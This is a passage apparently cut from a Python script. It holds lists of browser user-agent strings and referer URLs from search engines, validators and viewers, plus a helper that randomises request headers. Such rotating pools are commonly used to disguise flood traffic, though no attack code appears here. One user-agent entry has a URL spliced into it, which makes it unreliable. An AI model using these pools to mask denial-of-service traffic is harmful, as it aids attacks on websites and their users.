"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7","Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0","Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN","Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
ref = ['http://help.baidu.com/searchResult?keywords=',
'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=',
'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=',
'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=',
'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=',
'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=',
'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=']
useragents = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20',
'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2',
'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2',
'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0',
'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0)',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
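# The lists above are plain data pools. A minimal sketch of how such pools are
# typically consumed follows: draw one referer and one user agent at random for
# each outgoing request. The helper name `build_headers` and the exact header
# set are illustrative assumptions, not taken from elsewhere in this script.
import random

def build_headers():
    # Pick one entry from each pool; duplicate entries in the lists only
    # change the selection weighting, not correctness.
    return {
        'User-Agent': random.choice(useragents),
        'Referer': random.choice(ref),
    }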
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1',
'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1',
'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5',
